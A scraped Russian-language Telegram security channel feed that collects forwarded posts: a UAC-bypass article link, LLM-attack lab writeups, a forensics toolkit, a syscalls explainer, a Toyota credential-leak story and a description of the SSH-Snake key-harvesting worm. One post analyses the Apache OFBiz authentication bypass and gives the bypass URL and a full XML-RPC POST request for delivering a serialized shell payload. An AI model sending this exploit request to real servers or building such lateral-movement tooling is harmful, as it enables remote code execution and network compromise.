Forwarded from Purple Chronicles (ELK Enjoyer)
"Как обойти UAC?"
Такой вопрос может возникнуть в тот момент, когда у нас есть шелл на атакуемой машине, скомпрометированный пользователь входит в административную группу, но попытка выполнить любое привилегированное действие приводит к ошибке "Отказано в доступе"
В этой статье мы поговорим про UAC чуть подробнее и рассмотрим классический способ его обхода при помощи fodhelper.exe как с отключенным, так и с работающим Windows Defender
Также познакомимся с одним из способов мониторинга и обнаружения вредоносной активности на примере MP SIEM
https://telegra.ph/UAC-bypass-01-12
Если вы ничего не слышали про UAC и не понимаете, о чем идёт речь, то не переживайте: необходимый теоретический материал приведён в начале статьи.
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
UAC bypass with fodhelper.exe vs Windows Defender
Всем привет! Сегодня мы разберёмся с методикой обхода UAC при помощи утилиты fodhelper.exe, рассмотрим несколько способов при отключенном Windows Defender, а также усложним задачу и обманем защитник Windows, приправив всё капелькой теории.
Forwarded from PWN AI
И вот, лабы стали доступны. Я уже прошёл 3/4 и хочу поделиться с вами райтапом. Сейчас вы можете посмотреть 1ую часть и 2ух лаб, связанных с эксплуатацией уязвимостей через LLM API:
https://teletype.in/@wearetyomsmnv/lmQKDcRMH9c
Как только я решу 4ую лабу, так сразу я опубликую следующую часть!
https://teletype.in/@wearetyomsmnv/lmQKDcRMH9c
Как только я решу 4ую лабу, так сразу я опубликую следующую часть!
Teletype
PortSwigger labs, Web LLM attacks, writeup, p1
Начнём с самой простой лабы
This media is not supported in your browser
VIEW IN TELEGRAM
#web #pentest
Приветствую! Это статья о клиентских уязвимостях, которые мне показались интересными.
Целью статьи является показать, что иногда из, казалось бы, скучных уязвимостей с низким импактом, можно выжимать больше, чем кажется.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from AP Security
#форензика #SOC #утилиты
Forensictools - это набор инструментов, предназначенный для цифровой криминалистики и предлагающий широкий спектр возможностей для сотрудника расследования инцидентов🔍
Его основная цель - упростить создание виртуальной среды для проведения криминалистических экспертиз.
➡️ Это своего рода чемоданчик, собранный в готовый exe, в котором лежат базовые инструменты криминалиста: от hex editor до работы с хэшем, анализ бинарных файлов ( знаменитый detect it easy) и обработка артефактов windows, а также многое и многое другое.
Скачать данный набор и изучить весь его спектр можно по ссылочке на GitHub.
📶 Поделиться мнением о данном инструменте или обсудить волнующий вопрос с единомышленниками можно в чате канала AP Security.
Forensictools - это набор инструментов, предназначенный для цифровой криминалистики и предлагающий широкий спектр возможностей для сотрудника расследования инцидентов
Его основная цель - упростить создание виртуальной среды для проведения криминалистических экспертиз.
Скачать данный набор и изучить весь его спектр можно по ссылочке на GitHub.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤14
Forwarded from Monkey Hacker
Oh yes, ping pong
Под конец прошлого года, прошла шумиха с Apache Ofbiz, который позволял сделать байпас аутентификации и проабьюзать😺
Суть заключается в том, что
Тут все начинается с
Дальше идем в
Т.е по факту, мы тупо можем обойти проверку, путем вставки любого символа ему, и плюс
Поэтому мы можем дергать ручки
А через серелиализацию, мы передаем наш шелл, который можно сделать через ysoserial
Под конец прошлого года, прошла шумиха с Apache Ofbiz, который позволял сделать байпас аутентификации и проабьюзать
XML-RPC. Решил глянуть, что это было и как оно происходит Суть заключается в том, что
XML-RPC, по логике можно использовать только с валидными кредами, но глянем на сам момент аутентификации юзера в LoginWorker.javaList<String> unpwErrMsgList = new LinkedList<String>();
if (UtilValidate.isEmpty(username)) {
unpwErrMsgList.add(UtilProperties.getMessage(resourceWebapp, "loginevents.username_was_empty_reenter", UtilHttp.getLocale(request)));
}
if (UtilValidate.isEmpty(password) && UtilValidate.isEmpty(token)) {
unpwErrMsgList.add(UtilProperties.getMessage(resourceWebapp, "loginevents.password_was_empty_reenter", UtilHttp.getLocale(request)));
}
boolean requirePasswordChange = "Y".equals(request.getParameter("requirePasswordChange"));
if (!unpwErrMsgList.isEmpty()) {
request.setAttribute("_ERROR_MESSAGE_LIST_", unpwErrMsgList);
return requirePasswordChange ? "requirePasswordChange" : "error";
}
Тут все начинается с
requirePasswordChange, который не обращает внимание на то, введет ли юзер валидные креды. Если юзер в качестве параметра отдает Y, то метод login(HttpServletRequest request, HttpServletResponse response) вернет строку requirePasswordChangeДальше идем в
checkLogin() и там уже идет следующий моментif (username == null
|| (password == null && token == null)
|| "error".equals(login(request, response)))
Т.е по факту, мы тупо можем обойти проверку, путем вставки любого символа ему, и плюс
"error".equals(login(request, response)) не будет срабатывать, т.к мы заставили login(...) вернуть requirePasswordChangeПоэтому мы можем дергать ручки
XML-RPC/webtools/control/ping?USERNAME=&PASSWORD=s&requirePasswordChange=Y
А через серелиализацию, мы передаем наш шелл, который можно сделать через ysoserial
POST /webtools/control/xmlrpc/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Length: 4002
Content-Type: application/xml
<?xml version="1.0"?>
<methodCall>
<methodName>Methodname</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="https://ws.apache.org/xmlrpc/namespaces/extensions">serialized_shell</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
Багхантинг — очень интересное занятие (по моему скромному мнению 🙂). Никогда не знаешь, какую уязвимость удастся найти сегодня. Каждый белый хакер уникален и имеет собственный стиль, так же как художники, учителя и специалисты любого другого профиля.
Тяжелым трудом приобретаются необходимые навыки и оттачиваются техники поиска уязвимостей определенных классов. В случае успеха приложенные усилия окупаются наградой: можно получить крупное денежное вознаграждение.
Please open Telegram to view this post
VIEW IN TELEGRAM
Все мы знаем про чат Кавычки, чат RedTeam Brazzers и подобные. Но что если попробовать собрать багхантеров, веберов, инфраструктурщиков, мобильщиков, blue team, red team и даже purple team? А также админов других крупных телеграм каналов!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8🔥7👏4
Forwarded from Cybred
https://github.com/MegaManSec/SSH-Snake
SSH-Snake — это bash-скрипт для автоматического обхода сети с использованием ssh-ключей, обнаруженных на скомпрометированных системах, и создания полной карты всех взломанных хостов.
Принцип работы:
1. Найти на текущей машине все приватные ssh-ключи
2. Просканировать сеть и найти живые хосты, к которым можно подключиться
3. Попытаться подключиться к хостам с ключами, найденными в первом пункте
4. После подключения к новому устройству, повторить все шаги, начиная с первого.
Возможности:
— переходит от одной системы к другой только с помощью bash и stdin, не создавая никаких файлов
— как только попал на новую систему, автоматически пытается повыситься до рута, используя sudo
— ищет закрытые ключи в часто используемых файлах и папках, обход гибко настраивается
— запоминает, какие машины уже были просканированы, чтобы не подключаться к ним снова
— генерирует на выходе готовый граф (вдохновлен bloodhound) и сохраняет все приватные ключи
SSH-Snake — это bash-скрипт для автоматического обхода сети с использованием ssh-ключей, обнаруженных на скомпрометированных системах, и создания полной карты всех взломанных хостов.
Принцип работы:
1. Найти на текущей машине все приватные ssh-ключи
2. Просканировать сеть и найти живые хосты, к которым можно подключиться
3. Попытаться подключиться к хостам с ключами, найденными в первом пункте
4. После подключения к новому устройству, повторить все шаги, начиная с первого.
Возможности:
— переходит от одной системы к другой только с помощью bash и stdin, не создавая никаких файлов
— как только попал на новую систему, автоматически пытается повыситься до рута, используя sudo
— ищет закрытые ключи в часто используемых файлах и папках, обход гибко настраивается
— запоминает, какие машины уже были просканированы, чтобы не подключаться к ним снова
— генерирует на выходе готовый граф (вдохновлен bloodhound) и сохраняет все приватные ключи
GitHub
GitHub - MegaManSec/SSH-Snake: SSH-Snake is a self-propagating, self-replicating, file-less script that automates the post-exploitation…
SSH-Snake is a self-propagating, self-replicating, file-less script that automates the post-exploitation task of SSH private key and host discovery. - MegaManSec/SSH-Snake
🔥8 2❤1
Раз сегодня такой день активности на канале, то можно и суету навести
🥰8🌚4❤1
user space) и пространством ядра (kernel space) операционной системы. Пространство пользователя — это область памяти, где выполняются пользовательские программы, не имеющие прямого доступа к ресурсам аппаратного обеспечения или критическим функциям управления системой.
Пространство ядра — это контролируемая область, которая управляет аппаратным обеспечением компьютера и системными ресурсами.
Для чего нужны syscalls:
Они нужны для выполнения различных задач, связанных с управлением операционной системой и аппаратным обеспечением, таких как:
1. Управление файлами — создание, чтение, запись и удаление файлов.
2. Управление процессами — создание новых процессов, завершение процессов, управление приоритетом и другие задачи по взаимодействию с процессами.
3. Управление памятью — выделение и освобождение памяти, управление защитой памяти.
4. Коммуникация между процессами (IPC) — механизмы для обмена данными между процессами.
5. Ввод-вывод — доступ к устройствам ввода-вывода, таким как диски, сетевые карты, принтеры и т.д.
6. Сетевое взаимодействие — операции, связанные с сетевыми соединениями и передачей данных.
Как работают syscalls:
Когда пользовательская программа требует выполнить операцию, которая не может быть выполнена в пространстве пользователя из-за ограничений безопасности, она делает системный вызов. Программа выполняет специфическую инструкцию процессора, которая инициирует переключение контекста с пространства пользователя на пространство ядра. С этого момента ядро операционной системы начинает работу от имени программы.
Пример системного вызова на псевдокоде:
int status;
status = syscall(SYS_write, fileDescriptor, buffer, count);
В этом примере программа вызывает системный вызов
write через обобщенную функцию syscall, где SYS_write — это идентификатор системного вызова write, fileDescriptor указывает на открытый файл, в который программа хочет записать данные, buffer — это адрес начала данных для записи, а count — это количество байтов для записи.Применение syscalls:
Системные вызовы применяются во всех операционных системах, включая Unix-подобные системы (Linux, macOS) и Windows, для обеспечения безопасного и упорядоченного доступа к ресурсам компьютера. Они являются фундаментальной частью интерфейса программирования приложений (API) операционной системы.
Использование системных вызовов позволяет разработчикам приложений не заботиться о низкоуровневой реализации управления ресурсами и сосредоточиться на создании самого приложения. Кроме того, ядро операционной системы может управлять доступом к ресурсам и обеспечивать безопасность системы, изолируя пользовательские программы от прямого доступа к устройствам и системным функциям.
Please open Telegram to view this post
VIEW IN TELEGRAM
Думаете я сошёл с ума? Могу вам справку показать :D
Но к примеру он не умеет в appsec, а конкретнее в анализ кода полноценный, как тот же Snyk. А даже если бы умел, то нужны и постоянно обновляемые базы данных уязвимостей, как CVE, так и на основе кодовой базы.
Его можно дополнить интересным инструментов Tracee, от тех же разрабов. Интересная штука, но уже работающая на основе eBPF.
Ещё можно вспомнить про всякие SAST, DAST, IAST, MAST, SCA и поиск секретов в коде. С чем-то мы уже справляемся хорошо, к примеру поиск секретов и SAST. MAST на рынке пока мало, но есть один вполне хороший. Юра это про тебя
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9⚡3👏2👾1 1
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9❤🔥1
Зачем дробить контент?
Я вполне много выкладываю постов в неделю, но когда что-то ищешь, то либо по ключевым словам, либо листать ленту, что как раз уже долго слишком. Поэтому принял решение о частичном разделении контента.
Также для удобства сделал общую ссылку на всё
https://t.iss.one/addlist/hvA0Mk2ngT1mZDJi
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥10 4🔥2🥰2❤1⚡1
Forwarded from Cybred
Исследователь, который в прошлый раз взломал «Хонду», продолжает рассказывать о своих находках. На этот раз в Toyota
🔹Premium-калькулятор на сайте компании ликал секреты от учетной записи корпоративного аккаунта Microsoft.
🔹Один из запросов к калькулятору был закрыт HTTP Basic Auth, но возвращал ошибку с валидными кредами (!).
🔹Пароль можно было использовать для входа в аккаунт
🔹В учетной записи электронной почты хранились все сообщения, которые компания когда-либо отправляла своим клиентам, а именно: 657 тысяч писем (~25 ГБ) с информацией о клиентах, PDF-файлами страховых полисов, ссылками на сброс пароля, OTP и многое другое.
🔹 Помимо почты, были доступны и другие облачные ресурсы Microsoft, включая SharePoint, Teams, и многое другое
🫠 Спустя два месяца, баг исправили, но до сих пор не сменили пароль от найденной учетки.
🔹Premium-калькулятор на сайте компании ликал секреты от учетной записи корпоративного аккаунта Microsoft.
🔹Один из запросов к калькулятору был закрыт HTTP Basic Auth, но возвращал ошибку с валидными кредами (!).
🔹Пароль можно было использовать для входа в аккаунт
[email protected], 2FA был отключен🔹В учетной записи электронной почты хранились все сообщения, которые компания когда-либо отправляла своим клиентам, а именно: 657 тысяч писем (~25 ГБ) с информацией о клиентах, PDF-файлами страховых полисов, ссылками на сброс пароля, OTP и многое другое.
🔹 Помимо почты, были доступны и другие облачные ресурсы Microsoft, включая SharePoint, Teams, и многое другое
🫠 Спустя два месяца, баг исправили, но до сих пор не сменили пароль от найденной учетки.
🐳8🌚3 2
Злоумышленники могут успешно атаковать 98% веб-приложений. И это не просто громкие цифры, а данные из исследования Positive Technologies. Как такое возможно, если есть инструменты и практики типа SAST, DAST и WAF, а разработчики вроде бы нормально кодят?
Давайте я объясню, как устроены опасные атаки, на примере с разработчиком Василием, который работает в интернет-магазине и которому начальство подкидывает разные интересные задачки.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤3 1